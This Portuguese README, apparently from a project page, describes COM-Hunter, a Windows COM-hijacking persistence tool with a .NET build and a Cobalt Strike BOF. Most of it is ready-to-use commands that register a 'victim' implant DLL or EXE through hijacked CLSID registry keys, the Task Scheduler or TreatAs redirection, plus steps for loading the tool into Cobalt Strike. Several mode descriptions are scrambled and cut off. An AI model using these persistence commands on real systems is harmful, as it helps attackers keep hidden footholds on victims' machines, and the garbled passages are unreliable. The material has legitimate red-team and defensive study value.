
Ferramenta de persistência de sequestro de COM do Windows com modos de busca, clássico, Agendador de Tarefas e TreatAs. Disponível como executável .NET e BOF do Cobalt Strike para operações de red team.
COM Hijacking VOODOO

COM-Hunter é uma ferramenta de persistência por COM Hijacking.
Disponível tanto em versão .NET quanto em variante BOF totalmente compatível com Cobalt Strike.
A lista a seguir explica os modos disponíveis:
LocalServer32, InprocServer32 e entradas de registro em ambos HKLM e HKCU.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32 ou InprocServer32.LocalServer32, InprocServer32 e entradas de registro relacionadas em ambos e .ℹ️ Esta ferramenta foi selecionada e faz parte orgulhosamente do Cobalt Strike Community Kit.
Se encontrar algum bug, não hesite em reportá-los. Seu feedback é valioso para melhorar a qualidade deste projeto!
Os autores e contribuidores deste projeto não são responsáveis por qualquer uso ilegal da ferramenta. Ela é destinada apenas para fins educacionais. Os usuários são responsáveis por garantir o uso legal.
Este projeto foi criado com ❤️ por @nickvourd && @S1ckB0y1337.
Agradecimento especial ao meu amigo Marios Gyftos pela sua inestimável ajuda durante a fase de testes beta desta ferramenta.
Inspirado pelo curso RTO da @zeropointsecltd.
Implementação BOF inspirada por Lefteris Panos e seu excelente projeto, RegPersist.
Os arquivos base.c e bofdefs.h são cópias diretas do projeto CS-Situational-Awareness-BOF da TrustedSec.
██████╗ ██████╗ ███╗ ███╗ ██╗ ██╗██╗ ██╗███╗ ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║ ██║ ██║██║ ██║████╗ ██║╚══██╔══╝██╔════╝██╔══██╗
██║ ██║ ██║██╔████╔██║█████╗███████║██║ ██║██╔██╗ ██║ ██║ █████╗ ██████╔╝
██║ ██║ ██║██║╚██╔╝██║╚════╝██╔══██║██║ ██║██║╚██╗██║ ██║ ██╔══╝ ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ██║ ███████╗██║ ██║
╚═════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝ ╚═╝ ╚══════╝╚═╝ ╚═╝
Version: 3.0
@nickvourd && @S1ckB0y1337
~ Inspirado durante o curso RTO por @zeropointsecltd ~
Uso: COM_Hunter.exe <modo> <opções>
[+] Modos Disponíveis:
search Modo de Busca
persist Modo de Persistência Clássica
tasksch Modo de Tarefa Agendada
treatas Modo TreatAs
remove Modo de Remoção
[+] Modo de Busca:
Uso: COM-Hunter.exe search <CLSID> <opções>
-a, --all Buscar implementações DLL e EXE em HKLM e HKCU
-i, --inprocserver32 Buscar implementações DLL em HKLM e HKCU
-l, --localserver32 Buscar implementações EXE em HKLM e HKCU
-m, --machine Buscar implementações DLL e EXE em HKLM
-u, --user Buscar implementações DLL e EXE em HKCU
[+] Modo de Persistência Clássica:
Uso: COM-Hunter.exe persist <CLSID> <caminho_do_binário> <opção>
-i, --inprocserver32 Definir implementação DLL
-l, --localserver32 Definir implementação EXE
[+] Modo de Tarefa Agendada:
Uso: COM-Hunter.exe tasksch <caminho_do_binário> <opção>
-i, --inprocserver32 Definir implementação DLL
-l, --localserver32 Definir implementação EXE
[+] Modo TreatAs:
Uso: COM-Hunter.exe treatas <CLSID> <CLSID_falso> <caminho_do_binário> <opção>
-i, --inprocserver32 Definir implementação DLL
-l, --localserver32 Definir implementação EXE
[+] Modo de Remoção:
Uso: COM-Hunter.exe remove <CLSID> <opções>
-a, --all Remover implementações DLL e EXE em HKLM e HKCU
-i, --inprocserver32 Remover implementações DLL em HKLM e HKCU
-l, --localserver32 Remover implementações EXE em HKLM e HKCU
-m, --machine Remover implementações DLL e EXE em HKLM
-u, --user Remover implementações DLL e EXE em HKCU
ℹ️ Buscar implementações DLL e EXE em HKLM e HKCU:
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a
ℹ️ Buscar implementações EXE em HKLM e HKCU:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l
ℹ️ Busca avançada de implementações EXE em HKLM:
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine
ℹ️ Buscar implementações EXE e DLL em HKCU:
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user
ℹ️ Realizar persistência clássica usando implementação DLL:
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i
ℹ️ Realizar persistência clássica usando implementação EXE:
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32
ℹ️ Realizar persistência via Agendador de Tarefas usando implementação DLL:
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32
ℹ️ Realizar persistência via a chave de registro TreatAs e um CLSID falso (encaminhável) usando implementação DLL:
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i
ℹ️ Remover persistência de implementação DLL em HKCU usando:
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u
ℹ️ Requer toolchain MinGW-w64 (x86_64-w64-mingw32-gcc e i686-w64-mingw32-gcc)
ℹ️ Compile os objetos BOF para ambas as arquiteturas:
./make_all.sh
Isso irá:
com_hunter_*.com_hunter_*.x64.o e com_hunter_*.x86.o.com_hunter_*/.ℹ️ Após compilar os módulos BOF, basta carregar com_hunter_bof.cna no Cobalt Strike.
ℹ️ Para limpar artefatos de build, vá em cada diretório src e execute:
make clean
HKLMHKCU